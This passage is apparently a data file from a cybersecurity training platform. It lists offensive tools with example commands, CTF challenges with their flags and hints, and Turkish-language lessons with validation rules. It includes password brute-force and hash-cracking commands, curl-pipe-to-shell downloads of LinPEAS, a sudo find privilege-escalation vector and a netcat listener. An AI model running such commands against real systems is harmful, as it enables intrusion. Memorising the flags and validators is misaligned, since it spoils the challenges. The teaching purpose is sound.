    install: 'sudo apt install hydra',
    flags: [
      { flag: '-l / -L', description: 'Single user / user list' },
      { flag: '-p / -P', description: 'Single password / password list' },
      { flag: '-t',      description: 'Thread count' },
      { flag: '-s',      description: 'Specify port' },
      { flag: '-V',      description: 'Show every attempt' },
      { flag: '-f',      description: 'Stop on first success' },
    ],
    examples: [
      { command: 'hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.1', description: 'SSH brute-force' },
      { command: 'hydra -L users.txt -P pass.txt ftp://target -t 4', description: 'FTP list-based attack' },
      { command: "hydra -l admin -P rockyou.txt target http-post-form '/login:user=^USER^&pass=^PASS^:Invalid'", description: 'HTTP form brute-force' },
    ],
    tags: ['brute-force', 'password', 'ssh'],
  },
  {
    id: 'hashcat',
    name: 'Hashcat',
    category: 'Password',
    difficulty: 'intermediate',
    version: '6.2.6',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'GPU-accelerated hash cracker — the world\'s fastest password recovery tool.',
    install: 'sudo apt install hashcat',
    flags: [
      { flag: '-m',     description: 'Hash mode (0=MD5, 1000=NTLM, 1800=sha512)' },
      { flag: '-a',     description: 'Attack mode (0=dictionary, 3=brute)' },
      { flag: '-o',     description: 'Output file' },
      { flag: '--show', description: 'Show cracked hashes' },
      { flag: '-r',     description: 'Rule file' },
    ],
    examples: [
      { command: 'hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt', description: 'MD5 dictionary attack' },
      { command: 'hashcat -m 1000 ntlm_hashes.txt wordlist.txt -r rules/best64.rule', description: 'NTLM + rule-based' },
      { command: 'hashcat -m 1800 shadow.hash wordlist.txt --force', description: 'Crack SHA-512 Unix hashes' },
    ],
    tags: ['password', 'hash', 'gpu'],
  },
  {
    id: 'john',
    name: 'John the Ripper',
    category: 'Password',
    difficulty: 'beginner',
    version: '1.9.0-jumbo',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Multi-format hash cracker for /etc/shadow and other offline workloads.',
    install: 'sudo apt install john',
    flags: [
      { flag: '--wordlist',    description: 'Specify wordlist' },
      { flag: '--format',      description: 'Hash format (md5, sha1, bcrypt)' },
      { flag: '--rules',       description: 'Rule-based mutation' },
      { flag: '--show',        description: 'Show cracked passwords' },
      { flag: '--incremental', description: 'Brute-force mode' },
    ],
    examples: [
      { command: 'john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt', description: 'Dictionary attack' },
      { command: 'unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt', description: 'Crack shadow file' },
      { command: 'ssh2john id_rsa > ssh_hash.txt && john ssh_hash.txt --wordlist=rockyou.txt', description: 'Crack SSH key passphrase' },
    ],
    tags: ['password', 'hash', 'offline'],
  },

  // ── Recon ────────────────────────────────────────────────────────────────────

  {
    id: 'linpeas',
    name: 'LinPEAS',
    category: 'Recon',
    difficulty: 'intermediate',
    version: 'latest',
    os: ['Linux'],
    description: 'Automated Linux privilege escalation checker with color-coded output.',
    install: 'curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh',
    flags: [
      { flag: '-a', description: 'Run all checks' },
      { flag: '-s', description: 'Quiet mode (critical only)' },
      { flag: '-q', description: 'Fast mode' },
    ],
    examples: [
      { command: 'curl -s http://server/linpeas.sh | bash', description: 'Download and execute in-memory' },
      { command: './linpeas.sh 2>/dev/null | tee linpeas_output.txt', description: 'Persist output to file' },
      { command: "./linpeas.sh -a 2>/dev/null | grep -A5 '99%\\|95%'", description: 'Filter critical findings' },
    ],
    tags: ['privesc', 'linux', 'post-exploitation'],
  },
  {
    id: 'amass',
    name: 'Amass',
    category: 'Recon',
    difficulty: 'intermediate',
    version: '4.2.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Comprehensive subdomain discovery tool — 50+ data sources for attack-surface mapping.',
    install: 'go install -v github.com/owasp-amass/amass/v4/...@master\n# or:\nsudo apt install amass',
    flags: [
      { flag: 'enum -d <domain>',  description: 'Subdomain enumeration' },
      { flag: '-passive',          description: 'Passive sources only' },
      { flag: '-active',           description: 'Include active scanning' },
      { flag: '-o <file>',         description: 'Save results to file' },
      { flag: 'viz -d3',           description: 'D3 visualization' },
    ],
    examples: [
      { command: 'amass enum -d target.com -passive',     description: 'Passive subdomain discovery' },
      { command: 'amass enum -d target.com -active -o subdomains.txt', description: 'Active discovery + save' },
      { command: 'amass intel -whois -d target.com',      description: 'Recon via WHOIS records' },
    ],
    tags: ['subdomain', 'recon', 'attack-surface', 'osint'],
  },
  {
    id: 'sublist3r',
    name: 'Sublist3r',
    category: 'Recon',
    difficulty: 'beginner',
    version: '1.1',
    os: ['Linux', 'macOS'],
    description: 'Subdomain enumerator that pulls from Google, Yahoo, Bing, Baidu and more.',
    install: 'pip3 install sublist3r\n# or:\ngit clone https://github.com/aboul3la/Sublist3r && pip3 install -r requirements.txt',
    flags: [
      { flag: '-d <domain>',  description: 'Target domain' },
      { flag: '-b',           description: 'Brute-force subdomain list' },
      { flag: '-t <threads>', description: 'Thread count' },
      { flag: '-o <file>',    description: 'Output file' },
      { flag: '-e <engines>', description: 'Select engines (google,bing,yahoo)' },
    ],
    examples: [
      { command: 'python3 sublist3r.py -d target.com',            description: 'Basic subdomain scan' },
      { command: 'python3 sublist3r.py -d target.com -b -t 30',   description: 'Brute-forced extended sweep' },
      { command: 'python3 sublist3r.py -d target.com -o subs.txt', description: 'Save to file' },
    ],
    tags: ['subdomain', 'recon', 'osint'],
  },
  {
    id: 'recon-ng',
    name: 'Recon-ng',
    category: 'Recon',
    difficulty: 'intermediate',
    version: '5.1.2',
    os: ['Linux', 'macOS'],
    description: 'OSINT and web reconnaissance framework with a modular professional intel pipeline.',
    install: 'sudo apt install recon-ng\n# or:\ngit clone https://github.com/lanmaster53/recon-ng',
    flags: [
      { flag: 'marketplace search',    description: 'Search modules' },
      { flag: 'marketplace install',   description: 'Install module' },
      { flag: 'modules load',          description: 'Load a module' },
      { flag: 'options set SOURCE',    description: 'Set target domain' },
      { flag: 'run',                   description: 'Execute the module' },
    ],
    examples: [
      { command: 'recon-ng -w target_workspace', description: 'Create a new workspace' },
      { command: "marketplace install recon/domains-hosts/hackertarget\nmodules load recon/domains-hosts/hackertarget\noptions set SOURCE target.com\nrun", description: 'Host discovery via HackerTarget' },
    ],
    tags: ['recon', 'osint', 'framework', 'subdomain'],
  },

  // ── Reverse ──────────────────────────────────────────────────────────────────

  {
    id: 'gdb',
    name: 'GDB + pwndbg',
    category: 'Reverse',
    difficulty: 'advanced',
    version: '14.2 + pwndbg 2024.02',
    os: ['Linux', 'macOS'],
    description: 'GNU Debugger augmented with the pwndbg plugin for binary analysis and exploit dev.',
    install: 'sudo apt install gdb\npip3 install pwndbg\n# or:\ngit clone https://github.com/pwndbg/pwndbg && ./setup.sh',
    flags: [
      { flag: 'r / run',        description: 'Run the program' },
      { flag: 'b *0xaddress',   description: 'Set breakpoint' },
      { flag: 'c / continue',   description: 'Continue execution' },
      { flag: 'ni / si',        description: 'Step over / step into' },
      { flag: 'x/20wx $esp',    description: 'Inspect the stack' },
      { flag: 'info registers', description: 'Register values' },
      { flag: 'disas <func>',   description: 'Disassemble a function' },
      { flag: 'checksec',       description: 'Show binary protections' },
    ],
    examples: [
      { command: 'gdb ./binary\n(gdb) checksec\n(gdb) disas main\n(gdb) b *main+50\n(gdb) run', description: 'Standard analysis flow' },
      { command: "python3 -c \"print('A'*100)\" | gdb ./vuln", description: 'Overflow test' },
    ],
    tags: ['reverse', 'debugger', 'exploit-dev'],
  },
  {
    id: 'ghidra',
    name: 'Ghidra',
    category: 'Reverse',
    difficulty: 'advanced',
    version: '11.1.2',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'NSA-released open-source reverse engineering framework.',
    install: '# Download from https://ghidra-sre.org/\n# Java 17+ required:\nsudo apt install default-jre\nunzip ghidra_*.zip && ./ghidraRun',
    flags: [
      { flag: 'CodeBrowser',     description: 'Assembly and decompiler view' },
      { flag: 'Decompiler',      description: 'Produces C-like pseudocode' },
      { flag: 'Symbol Tree',     description: 'Function and string list' },
      { flag: 'Search → Memory', description: 'Search inside the binary' },
    ],
    examples: [
      { command: './support/analyzeHeadless ./ghidra_proj myProject -import binary.exe -postScript analyze.py', description: 'Headless automated analysis' },
    ],
    tags: ['reverse', 'static-analysis', 'decompiler'],
  },
  {
    id: 'radare2',
    name: 'Radare2',
    category: 'Reverse',
    difficulty: 'advanced',
    version: '5.9.4',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Open-source binary analysis framework — disassembly, debugging, patching, exploitation.',
    install: 'sudo apt install radare2\n# or:\ngit clone https://github.com/radareorg/radare2 && sys/install.sh',
    flags: [
      { flag: 'aaa',          description: 'Full analysis (all functions)' },
      { flag: 'afl',          description: 'Function list' },
      { flag: 'pdf @main',    description: 'Disassemble main' },
      { flag: 'iz',           description: 'List strings' },
      { flag: 'px 64 @esp',   description: 'Inspect the stack' },
      { flag: 'db 0xaddr',    description: 'Set breakpoint' },
      { flag: 'V',            description: 'Visual mode' },
    ],
    examples: [
      { command: 'r2 -A ./binary\n[0x...]> afl\n[0x...]> pdf @main', description: 'Analysis and main disassembly' },
      { command: 'r2 -d ./binary\n[0x...]> db main\n[0x...]> dc', description: 'Run under the debugger' },
    ],
    tags: ['reverse', 'binary-analysis', 'debugger', 'disassembler'],
  },
  {
    id: 'binwalk',
    name: 'Binwalk',
    category: 'Reverse',
    difficulty: 'intermediate',
    version: '2.4.3',
    os: ['Linux', 'macOS'],
    description: 'Firmware analysis, embedded filesystem extraction and binary inspection.',
    install: 'sudo apt install binwalk',
    flags: [
      { flag: '-e',  description: 'Extract files' },
      { flag: '-E',  description: 'Run entropy analysis' },
      { flag: '-A',  description: 'Scan opcodes' },
      { flag: '-M',  description: 'Recursive scan (matryoshka)' },
    ],
    examples: [
      { command: 'binwalk firmware.bin',   description: 'Scan for file signatures' },
      { command: 'binwalk -e firmware.bin', description: 'Extract embedded content' },
      { command: 'binwalk -E firmware.bin', description: 'Detect encrypted regions' },
    ],
    tags: ['firmware', 'forensics', 'reverse'],
  },

  // ── Forensics ─────────────────────────────────────────────────────────────────

  {
    id: 'volatility',
    name: 'Volatility',
    category: 'Forensics',
    difficulty: 'intermediate',
    version: '3.0.1',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Industry-leading memory (RAM) forensics framework — a CTF forensics staple.',
    install: 'pip3 install volatility3',
    flags: [
      { flag: 'windows.pslist',   description: 'List running processes' },
      { flag: 'windows.netscan',  description: 'Show network connections' },
      { flag: 'windows.dumpfiles', description: 'Extract files' },
      { flag: 'windows.hashdump', description: 'Pull NTLM hashes' },
      { flag: 'linux.bash',       description: 'Recover bash history' },
    ],
    examples: [
      { command: 'python3 vol.py -f memory.dmp windows.pslist',   description: 'Process listing' },
      { command: 'python3 vol.py -f memory.dmp windows.cmdline',  description: 'Process command lines' },
      { command: 'python3 vol.py -f memory.dmp windows.filescan | grep ".txt"', description: 'Find text files' },
    ],
    tags: ['forensics', 'memory', 'incident-response'],
  },

  // ── OSINT ─────────────────────────────────────────────────────────────────────

  {
    id: 'shodan',
    name: 'Shodan CLI',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '1.31',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Search engine for internet-exposed devices — IoT, cameras, SCADA and more.',
    install: 'pip3 install shodan && shodan init <API_KEY>',
    flags: [
      { flag: 'shodan search',  description: 'Run a search query' },
      { flag: 'shodan host',    description: 'Detail report for an IP' },
      { flag: 'shodan count',   description: 'Result count' },
      { flag: 'shodan stats',   description: 'Aggregated statistics' },
    ],
    examples: [
      { command: 'shodan search "apache country:TR"',                  description: 'Apache servers in Turkey' },
      { command: 'shodan host 1.2.3.4',                                description: 'IP address report' },
      { command: 'shodan search "port:22 country:TR" --limit 100',     description: 'Open SSH endpoints in Turkey' },
    ],
    tags: ['osint', 'recon', 'internet-scan'],
  },
  {
    id: 'theharvester',
    name: 'theHarvester',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '4.4.3',
    os: ['Linux', 'macOS'],
    description: 'Domain-driven harvesting of emails, subdomains and employee names.',
    install: 'sudo apt install theharvester',
    flags: [
      { flag: '-d', description: 'Target domain' },
      { flag: '-b', description: 'Source (google, bing, linkedin, shodan)' },
      { flag: '-l', description: 'Result limit' },
      { flag: '-f', description: 'HTML/XML report output' },
    ],
    examples: [
      { command: 'theHarvester -d target.com -b google,bing,linkedin', description: 'Multi-source enumeration' },
      { command: 'theHarvester -d target.com -b shodan -f report',     description: 'Shodan + HTML report' },
    ],
    tags: ['osint', 'email', 'recon'],
  },
  {
    id: 'maltego',
    name: 'Maltego',
    category: 'OSINT',
    difficulty: 'intermediate',
    version: 'CE 4.7',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Graph-based intelligence platform mapping people, orgs, IPs and domains.',
    install: '# Download Community Edition from maltego.com (free)\n# Java 11+ required:\nsudo apt install default-jre\n# Registration is required after download',
    flags: [
      { flag: 'Transforms',         description: 'Data transformation engine' },
      { flag: 'Entity Types',       description: 'Person, domain, IP, org, etc.' },
      { flag: 'Run All Transforms', description: 'Query all data sources' },
      { flag: 'Graph View',         description: 'Visualize the relationship map' },
    ],
    examples: [
      { command: '# Domain workflow\n1. Open a new graph\n2. Add Domain entity: target.com\n3. Run All Transforms\n4. Inspect linked subdomains and IPs', description: 'Domain intelligence collection' },
    ],
    tags: ['osint', 'visualization', 'intelligence', 'graph'],
  },
  {
    id: 'spiderfoot',
    name: 'SpiderFoot',
    category: 'OSINT',
    difficulty: 'beginner',
    version: '4.0',
    os: ['Linux', 'Windows', 'macOS'],
    description: 'Automated OSINT collection platform with 200+ sources and a web UI.',
    install: 'pip3 install spiderfoot\n# or:\ngit clone https://github.com/smicallef/spiderfoot\npip3 install -r requirements.txt',
    flags: [
      { flag: '-l <ip:port>',    description: 'Launch the web UI' },
      { flag: '-s <target>',     description: 'CLI target' },
      { flag: '-m <modules>',    description: 'Run specific modules' },
      { flag: '-t <type>',       description: 'Target type (DOMAIN, IP, NAME)' },
      { flag: '-o <format>',     description: 'Output format (tab, csv, json)' },
    ],
    examples: [
      { command: 'python3 sf.py -l 127.0.0.1:5001', description: 'Launch the web UI (open in browser)' },
      { command: 'python3 sf.py -s target.com -t DOMAIN -o csv > report.csv', description: 'Domain scan from the CLI' },
    ],
    tags: ['osint', 'automation', 'reconnaissance', 'internet'],
  },
]

// ─── Challenges ───────────────────────────────────────────────────────────────

export const CHALLENGES: Challenge[] = [
  {
    level: 1,
    title: 'RECONNAISSANCE',
    path: 'challenges/01-recon',
    difficulty: 'EASY',
    color: '#00ff41',
    description: 'Inspect /etc/passwd with cat and wc -l to derive the user count of this host.',
    flagKey: 'FLAG{r3con_master_l1nux}',
    hints: [
      'Start by listing the system users: `cat /etc/passwd`.',
      'Count the lines with a pipeline: `cat /etc/passwd | wc -l` — chaining two commands together.',
      'Once the line count is derived, the flag will reveal in the terminal automatically — no manual file read required.',
    ],
    commands: ['cat /etc/passwd', 'cat /etc/passwd | wc -l'],
  },
  {
    level: 2,
    title: 'FILE PERMISSIONS',
    path: 'challenges/02-perms',
    difficulty: 'EASY',
    color: '#00ff41',
    description: 'Use chmod to add execute permission to a script and run it under bash.',
    flagKey: 'FLAG{ch4mod_p3rm1ss10ns}',
    hints: [
      'Inspect the current permissions with `ls -la`.',
      'Grant the execute bit with `chmod +x secret.sh`.',
      'Run the script with `bash secret.sh`. When the prerequisites are met, the flag will reveal in the terminal.',
    ],
    commands: ['ls -la', 'chmod +x secret.sh', 'bash secret.sh'],
  },
  {
    level: 3,
    title: 'HIDDEN FILES',
    path: 'challenges/03-hidden',
    difficulty: 'MEDIUM',
    color: '#f59e0b',
    description: 'Find a hidden (dot-prefixed) file in this directory and inspect its contents.',
    flagKey: 'FLAG{h1dden_1n_pl41n_s1ght}',
    hints: [
      'Surface the hidden entries with `ls -la` (dotfiles are filtered from a plain `ls`).',
      'Notice the new entry that appears alongside the decoy and visible files.',
      'Read the hidden file with `cat .vault`. The flag will reveal in the terminal once you do.',
    ],
    commands: ['ls -la', 'cat .vault'],
  },
  {
    level: 4,
    title: 'GREP MASTER',
    path: 'challenges/04-grep',
    difficulty: 'MEDIUM',
    color: '#f59e0b',
    description: 'Use grep to filter the access log and surface the line containing the flag.',
    flagKey: 'FLAG{gr3p_1s_p0w3r}',
    hints: [
      'Reading every log line is wasteful — filter for the keyword instead.',
      'Run `grep "FLAG" access.log` (or `grep -n "FLAG" access.log` for line numbers).',
      'When the matching line renders, the flag reveals in the terminal automatically.',
    ],
    commands: ['grep "FLAG" access.log', 'grep -n "FLAG" access.log'],
  },
  {
    level: 5,
    title: 'PRIVILEGE ESCALATION',
    path: 'challenges/05-privesc',
    difficulty: 'HARD',
    color: '#ef4444',
    description: 'Identify the privesc vector via sudo -l and execute a root-context read.',
    flagKey: 'FLAG{pr1v3sc_r00t_0wn3d}',
    hints: [
      'List allowed root commands with `sudo -l`. Notice the NOPASSWD entry.',
      'Discover SUID surface area with `find / -perm -4000 2>/dev/null`.',
      'Trigger the GTFOBins find vector: `sudo find . -exec cat target \\;`. When the chain executes, the flag reveals.',
    ],
    commands: ['sudo -l', 'find / -perm -4000 2>/dev/null', 'sudo find . -exec cat target \\;'],
  },
  {
    level: 6,
    title: 'NETWORK ANALYSIS',
    path: 'challenges/06-network',
    difficulty: 'HARD',
    color: '#ef4444',
    description: 'Identify the unusual listening port, then correlate it in the system log.',
    flagKey: 'FLAG{n3tw0rk_m4st3r_2024}',
    hints: [
      'List open sockets with `ss -tulpn` or `netstat -tulpn` — t=tcp, u=udp, l=listening, p=process, n=numeric.',
      'A non-standard port `0.0.0.0:4444` LISTEN looks suspicious for a blue-team triage.',
      'Correlate it in syslog: `grep 4444 /var/log/syslog`. The flag reveals once the activity is correlated.',
    ],
    commands: ['ss -tulpn', 'netstat -tulpn', 'grep 4444 /var/log/syslog'],
  },
]

// Training Sets

export const TRAINING_SETS: TrainingSet[] = [
  {
    id: 'set-01-foundations',
    title: 'Foundations',
    subtitle: 'Linux terminal mastery, filesystem, and basic analysis routines',
    icon: 'OPS',
    color: '#00ff41',
    overview: {
      heading: 'Operations track',
      summary: 'This set is designed to make you manage the terminal, not just watch it. The goal is not to consume canned commands but to build operator-grade muscle for interpreting the filesystem, permissions, logs, and basic network indicators on your own.',
      pillars: ['Mission-first', 'Manual command discipline', 'Evidence-based validation', 'Operational reflection'],
      assessment: 'Each lesson runs as a mission briefing. You type the command; the system completes the lesson only when it captures the right evidence. Pre-canned terminal injection is disabled for this set.',
    },
    lessons: [
      {
        id: 's01-k01',
        title: 'Operatör çalışma alanını haritalama',
        description: 'Çalışma dizinini, operatör home alanını ve brifing dosyalarını kendi komutlarınla doğrula.',
        difficulty: 'kolay',
        duration: 18,
        mission: {
          objective: 'Operatör home dizininde yön bulmak ve brifing dokümanlarını tespit etmek.',
          operatorBrief: 'Bir operatör oturumu başladığında önce zemin okunur. Hangi klasördesin, hangi brifing dosyaları seni bekliyor ve çalışma alanın nerede; bunları tahmin ederek değil kanıtlayarak öğrenmelisin.',
          task: 'Operatör home dizinine kontrollü geçiş yap, sonra içeriği listeleyip brifing dosyasının göründüğünü kanıtla.',
          evidence: ['Geçiş için açık hedefli bir cd /home/operator komutu kullanılmalı.', 'Listeleme çıktılarında README.txt görünmeli.'],
          hints: ['Yalnızca path yazmak komut değildir; önce geçiş komutu ver.', 'Dizine girdikten sonra listeleme ile brifing dosyasını gör.', '`cd /home/operator` ve ardından `ls -la` ya da `ls -la /home/operator` beklenen kanıtı üretir.'],
          reflection: 'Bu görev, operatörün terminal oturumuna kaotik değil kontrollü girmesini öğretir. Doğru dizini kanıtlamak ve briefing dosyasını bulmak, sonraki her görev için temel bağlam oluşturur.',
          validation: [
            { id: 'command-home', label: 'Geçiş için açık hedefli cd /home/operator komutu kullanıldı', type: 'commandIncludesAll', values: ['cd', '/home/operator'] },
            { id: 'readme-visible', label: 'Listelemede README.txt görüldü', type: 'outputIncludes', values: ['README.txt'] },
          ],
        },
      },
      {
        id: 's01-k02',
        title: 'İzin ve yetki izi tarama',
        description: 'SUID izleri ve operatör dizinindeki izin görünümünü kanıt toplayarak incele.',
        difficulty: 'kolay',
        duration: 22,
        mission: {
          objective: 'Yetki yüzeyini gözle değil, terminal kanıtı ile okumak.',
          operatorBrief: 'Temel operasyonlarda ilk risk taraması genellikle izinlerden başlar. SUID binary listesi ve mevcut dizin izin görünümü, sistemde nereden ilerlenebileceğine dair ilk sinyali verir.',
          task: 'SUID binary araması yap ve kritik bir binary göründüğünü doğrula.',
          evidence: ['Aramada `-4000` perm parametresi kullanılmalı.', '`/usr/bin/sudo` çıktısı içinde görünmeli.'],
          hints: ['`find` komutu izin tabanlı aramayı destekler.', 'SUID aramalarında `-perm -4000` beklenir.', '`find / -perm -4000 2>/dev/null` komutu gerekli kanıtı verir.'],
          reflection: 'SUID ve sudo yüzeyi, yetki yükseltme düşüncesinin giriş kapısıdır. Buradaki amaç istismar etmek değil; sistemin neleri yanlış optimize etmiş olabileceğini görmeyi öğrenmektir.',
          validation: [
            { id: 'find-suid', label: 'SUID taraması uygun perm filtresi ile yapıldı', type: 'commandIncludesAll', values: ['find', '-4000'] },
            { id: 'sudo-found', label: 'Tarama çıktısında `/usr/bin/sudo` bulundu', type: 'outputIncludes', values: ['/usr/bin/sudo'] },
          ],
        },
      },
      {
        id: 's01-k03',
        title: 'Log içinde sinyal ayıklama',
        description: 'auth.log üzerinde başarısız kimlik denemelerini kendi filtrelerinle bul.',
        difficulty: 'kolay',
        duration: 20,
        mission: {
          objective: 'Ham logu hedefli sinyale indirgemek.',
          operatorBrief: 'Gerçek operasyonlarda log okumak, bütün dosyayı izlemek değil; gürültü içinden anlamlı paterni çekip almaktır. Bu derste başarısız SSH denemelerini ayıklayacaksın.',
          task: '`auth.log` içindeki başarısız giriş denemelerini filtrele ve görünür hale getir.',
          evidence: ['Komut zincirinde `grep` kullanılmalı.', 'Çıktı içinde `Failed password` metni yakalanmalı.'],
          hints: ['Log dosyasını önce gör, sonra filtrele.', '`grep` bir pattern ile çalışır.', '`cat /var/log/auth.log | grep "Failed"` veya `grep "Failed" /var/log/auth.log` beklenen yaklaşımdır.'],
          reflection: 'Bu görev, gözle tarama yerine pattern tabanlı düşünmeyi pekiştirir. Analist refleksi, log kalabalığını küçük bir karar alanına indirebildiği anda olgunlaşır.',
          validation: [
            { id: 'grep-used', label: 'Filtreleme için `grep` kullanıldı', type: 'commandIncludesAny', values: ['grep', 'grep -n'] },
            { id: 'failed-password', label: 'Başarısız parola girişleri ekrana getirildi', type: 'outputIncludes', values: ['Failed password'] },
          ],
        },
      },
      {
        id: 's01-k04',
        title: 'Ağ görünürlüğü okuma',
        description: 'Arayüz bilgisi ve açık servisleri okuyarak temel ağ fotoğrafı çıkar.',
        difficulty: 'kolay',
        duration: 18,
        mission: {
          objective: 'Makinenin ağ üzerindeki görünürlüğünü komut kanıtı ile okumak.',
          operatorBrief: 'Bir host hakkında ilk karar, servisleri ve arayüz kimliğini okumadan verilmez. Bu görevde hem IP bilgisini hem de açık dinleyen servisleri tek operatör bakışına çevireceksin.',
          task: 'Yerel arayüzü ve dinleyen servisleri sorgula.',
          evidence: ['Ağ komutlarından biri kullanılmalı.', 'Çıktı içinde `10.0.2.15` adresi görünmeli.'],
          hints: ['`ifconfig` arayüzü, `netstat/ss` ise dinleyen servisleri gösterir.', 'İki ayrı komut kullanman normaldir.', '`ifconfig` ve `netstat -tulpn` ikilisi beklenen tabloyu verir.'],
          reflection: 'Bu aşama, bir hostu sadece IP değil servis kimliğiyle okumayı öğretir. Yüzey okuması zayıf olan operatör, sonraki modüllerde neyi taradığını da doğru seçemez.',
          validation: [
            { id: 'network-command', label: 'Ağ görünürlüğü için `ifconfig` veya `netstat/ss` çalıştırıldı?', type: 'commandIncludesAny', values: ['ifconfig', 'netstat', 'ss'] },
            { id: 'network-output', label: 'IP ya da LISTEN servisi çıktı olarak görüldü?', type: 'outputIncludes', values: ['10.0.2.15'] },
          ],
        },
      },
      {
        id: 's01-o01',
        title: 'Bash ile küçük otomasyon',
        description: 'Tekrarlayan port kontrolünü kısa bir bash döngüsüne çevir.',
        difficulty: 'orta',
        duration: 34,
        mission: {
          objective: 'Tek komut yerine operasyona uygun mini otomasyon kurmak.',
          operatorBrief: 'Aynı işi dört kere elle yapmak yerine bash ile kısa bir denetim ritmi kurabilmelisin. Burada amaç script yazmak değil, operatör refleksi olarak tekrar eden işi otomatikleştirmektir.',
          task: 'Bash üzerinden bir döngü kur ve birden fazla portu satır satır raporla.',
          evidence: ['Komut zincirinde `bash` kullanılmalı.', 'Çıktı içinde `Port 22` ve `Port 443` gibi satırlar görünmeli.'],
          hints: ['Tek satırlık `bash -c` yapısı yeterli.', '`for` döngüsü kullanmak beklenen yaklaşımdır.', '`bash -c \"for p in 22 80 443; do echo Port $p; done\"` mantığı hedefleniyor.'],
          reflection: 'Bu görev, operatörün terminali sadece tüketen değil kompozisyon kuran bir araca dönüştürmesini sağlar. Mikro otomasyonlar sonraki pentest ve keşif akışları için kritik kas hafızasıdır.',
          validation: [
            { id: 'bash-loop', label: 'Bash üzerinden otomasyon akışı kuruldu', type: 'commandIncludesAll', values: ['bash', 'for'] },
            { id: 'port-output', label: 'Port tabanlı satırlar ekrana basıldı', type: 'outputIncludes', values: ['Port 22'] },
          ],
        },
      },
      {
        id: 's01-o02',
        title: 'Servis parmak izi toplama',
        description: 'Nmap ile tek hedef üzerinde servis bilgisi ve varsayılan script çıktıları topla.',
        difficulty: 'orta',
        duration: 32,
        mission: {
          objective: 'Port görüntüsünü servis ve script istihbaratına çevirmek.',
          operatorBrief: 'Basit bir port listesi operasyon için yeterli değildir. Versiyon ve varsayılan script çıktıları, hedefin nasıl bir yüzeye sahip olduğunu anlamak için daha zengin bir brifing üretir.',
          task: 'Bir hedefe servis tespiti yapan nmap taraması uygula.',
          evidence: ['Komutta `nmap` ve `-sV` bulunmalı.', 'Çıktı içinde servis raporu veya `Nmap done` satırı görünmeli.'],
          hints: ['Servis tespiti için `-sV` gerekir.', 'Varsayılan scriptler için `-sC` eklenebilir.', '`nmap -sV -sC 10.10.10.1` beklenen standarda yakındır.'],
          reflection: 'Keşif aşamasında kaliteyi belirleyen şey taramanın hızından çok bilgi yoğunluğudur. Servis parmak izi, sonraki istismar kararlarının isabetini artırır.',
          validation: [
            { id: 'nmap-service', label: 'Nmap servis tespiti bayrağı ile kullanıldı', type: 'commandIncludesAll', values: ['nmap', '-sV'] },
            { id: 'nmap-output', label: 'Tarama raporu ekrana geldi', type: 'outputIncludes', values: ['Nmap done'] },
          ],
        },
      },
      {
        id: 's01-o03',
        title: 'Netcat ile oturum dinleme',
        description: 'Dinleyici port aç ve bağlantı geldiğini terminal kanıtı ile izle.',
        difficulty: 'orta',
        duration: 28,
        mission: {
          objective: 'Dinleme portu açmak ve bağlantı davranışını okumak.',
          operatorBrief: 'Netcat, operatörün minimal ama keskin aracıdır. Bir dinleyici açtığında sadece port açmazsın; bağlantı kabulünün nasıl göründüğünü ve oturumun nasıl aktığını da okumayı öğrenirsin.',
          task: 'Dinleyici modda bir netcat oturumu aç ve bağlantı kabulünü gör.',
          evidence: ['Komutta `nc` veya `netcat` dinleme modunda kullanılmalı.', 'Çıktı içinde `Listening` veya `Connection received` görünmeli.'],
          hints: ['Dinleme için `-l` kullanılır.', 'Port belirtmek gerekir.', '`nc -lvnp 4444` veya benzeri bir dinleyici yeterlidir.'],
          reflection: 'Bu görev, operatörün aktif servis oluşturma ve bağlantı akışına dair sezgisini keskinleştirir. Netcat bilgisi, payload, banner grab ve ters bağlantı senaryoları için temel bir dildir.',
          validation: [
            { id: 'nc-listener', label: 'Netcat dinleyici modunda çalıştırıldı?', type: 'commandIncludesAny', values: ['nc -l', 'nc -lvnp', 'netcat -l'] },
            { id: 'nc-output', label: 'Dinleme ya da bağlantı kabul çıktısı alındı?', type: 'outputIncludes', values: ['Listening on'] },
          ],
        },
      },
      {
        id: 's01-o04',
        title: 'Süreç ve cron davranışı inceleme',
        description: 'Çalışan süreçleri ve zamanlanmış görevleri birlikte okuyarak operasyon izi çıkar.',
        difficulty: 'orta',
        duration: 26,
        mission: {
          objective: 'Makinedeki canlı süreç akışı ile zamanlanmış davranışı beraber yorumlamak.',
          operatorBrief: 'Sistem davranışı sadece aktif süreçlerden ibaret değildir. Cron gibi zamanlanmış işler, persistence veya bakım isimli gizli yüzeyler doğurabilir. Bu derste canlı ve zamanlanmış akışı tek bakışta toplayacaksın.',
          task: 'Çalışan süreçleri gör ve cron kayıtlarına bak.',
          evidence: ['`ps` ya da `top` ile süreç sorgusu yapılmalı.', '`crontab -l` çıktısı görünmeli.'],
          hints: ['Süreçler için `ps aux` yeterlidir.', 'Zamanlanmış görevler için `crontab -l` kullan.', 'İki ayrı komutla ilerlemek beklenen çözümdür.'],
          reflection: 'Bir hostu anlamak, o an ne çalıştığını ve sonra ne çalışacağını birlikte okuyabilmektir. Bu bakış açısı persistence ve anomalileri erkenden ayırt etmene yardım eder.',
          validation: [
            { id: 'process-check', label: 'Süreç görünümü için `ps` ya da `top` kullanıldı?', type: 'commandIncludesAny', values: ['ps', 'top'] },
            { id: 'cron-output', label: 'Crontab kayıtları ekrana getirildi', type: 'outputIncludes', values: ['/usr/bin/backup.sh'] },
          ],
        },
      },
      {
        id: 's01-z01',
        title: 'Yetki yükseltme brifingi',
        description: 'Sudo ve SUID yüzeyinden yükselme ihtimalini brifing formatında kanıtla.',
        difficulty: 'zor',
        duration: 58,
        mission: {
          objective: 'Yüksek riskli yetki yüzeyini exploit etmeden önce okuyup haritalamak.',
